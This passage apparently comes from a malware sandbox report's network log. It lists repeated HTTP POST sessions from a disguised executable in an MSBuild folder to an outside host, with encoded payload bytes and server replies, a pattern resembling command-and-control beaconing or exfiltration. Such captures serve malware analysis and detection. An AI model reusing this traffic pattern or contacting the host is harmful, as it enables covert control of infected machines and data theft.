                                                                                      Data Ascii: i0izrp7o7z1LRss+b9bo3LvXGhWqhdhPWR/kGT1Yex3TlK/xyCbkc4Me5u1Sd+m2/5TAI0W2OYnBFpisa9jUGZPQmzsrg5CN0vNnQkIGal5F5+/Rxr1pH1Bsy7rru7S11Sg0uXj/8wO1508e+PAvWYtySC1LHwi1fn0lyXm28pSzokaeVf7UhehbNJdQkQk9PIooaOnN1eDDNDVSViihwsffbID/JEbB/yiTRzCVgaaj/5r4Sew
                                                                                      Mar 6, 2024 09:52:52.331410885 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.44975891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:50.706254005 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:51.049701929 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:51.050121069 CET2548OUTData Raw: 51 59 54 5c 5b 5e 55 50 5e 57 5a 51 57 50 50 53 54 5c 54 5e 56 54 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT\[^UP^WZQWPPST\T^VTWZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/!.S$>'6/,6\319V5?<W"Z+^0<%,&-9%Z"!Q*
                                                                                      Mar 6, 2024 09:52:51.420874119 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:51 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.44975991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:51.892765999 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:52.235548973 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:52.235788107 CET1872OUTData Raw: 54 5f 51 5c 5b 5f 55 54 5e 57 5a 51 57 5f 50 59 54 5d 54 5b 56 5c 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_Q\[_UT^WZQW_PYT]T[V\W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C/-331$"_,';&)" Q540$$2%-9%Z"!Q*1
                                                                                      Mar 6, 2024 09:52:52.605741024 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 5d 25 15 0e 0c 22 30 3c 50 29 3e 26 5a 29 08 2e 5b 3c 06 03 5d 3d 2f 21 00 2c 00 2f 0f 3f 28 37 40 23 2f 2c 51 22 31 3c 55 32 03 20 5c 05 11 27 10 30 1c 21 58 27 14 2d 5a 30 32 2d 5b 26 11 2c 1c 2b 15 08 5c 27 3a 2b 1e 37 30 24 57 25 5c 33 5a 24 01 0f 59 2e 07 2f 1c 25 07 2d 54 02 17 21 0f 33 13 30 12 3f 0e 27 5a 31 31 39 14 3e 13 33 0d 35 39 2c 1d 21 33 0f 1f 31 38 07 05 36 0c 23 59 2b 3b 28 00 27 12 27 09 32 2e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.]%"0<P)>&Z).[<]=/!,/?(7@#/,Q"1<U2 \'0!X'-Z02-[&,+\':+70$W%\3Z$Y./%-T!30?'Z119>359,!3186#Y+;(''2.#U",R?\W0
                                                                                      Mar 6, 2024 09:52:52.606162071 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:52.949280977 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:52.949697018 CET2548OUTData Raw: 54 58 54 58 5b 5a 50 57 5e 57 5a 51 57 50 50 5d 54 5d 54 53 56 5e 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TXTX[ZPW^WZQWPP]T]TSV^WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@;.$U)06*]/X0''9(#<<!/34+&,);9%Z"!Q*
                                                                                      Mar 6, 2024 09:52:53.321913004 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:53 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.44976091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:53.806761026 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:54.153132915 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:54.293247938 CET2548OUTData Raw: 54 5d 54 5c 5e 5a 50 53 5e 57 5a 51 57 5c 50 5e 54 50 54 5b 56 54 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]T\^ZPS^WZQW\P^TPT[VTWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B8)%#)Z06.^8/)&(;Z%)T!(U"Z#X0'7]&:X,%Z"!Q*=
                                                                                      Mar 6, 2024 09:52:54.666429043 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.44976191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:55.444401026 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:55.784737110 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:55.785018921 CET2548OUTData Raw: 51 5d 51 5c 5e 59 50 57 5e 57 5a 51 57 5d 50 58 54 54 54 5b 56 5f 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]Q\^YPW^WZQW]PXTTT[V_W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B82935Z$8<6]3;0%_ Q5<"?,022/%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:56.151941061 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:55 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.44976291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:56.622031927 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:56.967185974 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:56.967591047 CET2548OUTData Raw: 54 5f 54 5c 5e 5a 50 56 5e 57 5a 51 57 5a 50 52 54 50 54 5a 56 5f 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_T\^ZPV^WZQWZPRTPTZV_W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/19%#!^$5:\;<!38Y1$P"7"?_'42>X,%Z"!Q*%
                                                                                      Mar 6, 2024 09:52:57.339699030 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:57 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.44976491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:57.964379072 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:58.305372953 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:58.305697918 CET1872OUTData Raw: 51 5b 54 58 5e 59 55 51 5e 57 5a 51 57 5b 50 5c 54 56 54 58 56 5d 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TX^YUQ^WZQW[P\TVTXV]WTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9,!*T'0"&&:Y;53;/X&<U#< !_$'#\12Y-)%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:58.675340891 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:58 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 59 26 2b 0e 0e 23 23 0e 50 2b 2e 2e 1c 3e 0f 26 13 3f 06 3d 5f 28 2f 26 16 3b 29 01 09 3f 01 2c 19 22 3f 0e 57 36 31 33 0b 26 29 20 5c 05 11 24 01 27 22 0f 58 27 03 29 5c 24 08 35 5f 26 06 2f 42 2a 2b 22 5b 26 39 3b 5c 20 23 24 57 25 29 2b 5a 24 3f 3a 01 39 3e 24 06 31 3d 2d 54 02 17 22 56 30 2e 24 5a 28 20 1a 05 26 32 3d 15 28 2d 20 53 22 5f 23 0d 36 30 39 5b 31 3b 25 04 22 0c 34 04 3f 3b 38 05 30 2f 3c 56 25 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.Y&+##P+..>&?=_(/&;)?,"?W613&) \$'"X')\$5_&/B*+"[&9;\ #$W%)+Z$?:9>$1=-T"V0.$Z( &2=(- S"_#609[1;%"4?;80/<V%>#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.44976591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:58.092155933 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:58.437748909 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:58.438003063 CET2548OUTData Raw: 51 59 54 50 5e 5d 55 50 5e 57 5a 51 57 5a 50 5b 54 55 54 52 56 54 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYTP^]UP^WZQWZP[TUTRVTW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@;3)$56-,!'#Z&_?"/<"Y$42?&Z-9%Z"!Q*%
                                                                                      Mar 6, 2024 09:52:58.810152054 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:58 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.44976691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:59.295599937 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:59.639029980 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:59.639363050 CET2548OUTData Raw: 51 59 54 5f 5b 5f 55 54 5e 57 5a 51 57 5b 50 5d 54 53 54 5a 56 5a 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT_[_UT^WZQW[P]TSTZVZW\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B,"53U&$&6-?13019,!!,(37Y%,Y89%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:00.012213945 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:59 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.44976791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:00.484271049 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:00.827367067 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:00.827631950 CET2548OUTData Raw: 54 58 54 50 5e 59 55 50 5e 57 5a 51 57 58 50 5e 54 53 54 59 56 5c 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TXTP^YUP^WZQWXP^TSTYV\W]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;233&'*\;'; 2,"$5/X37#%<8)%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:01.202150106 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:01 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.44976891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:01.671350002 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:02.019824982 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:02.020070076 CET2548OUTData Raw: 54 5f 54 51 5e 5d 50 53 5e 57 5a 51 57 5d 50 59 54 51 54 58 56 59 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_TQ^]PS^WZQW]PYTQTXVYWZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;1360&853(%9Q557X&$'&.\,%Z"!Q*9
                                                                                      Mar 6, 2024 09:53:02.420016050 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:02 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.44976991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
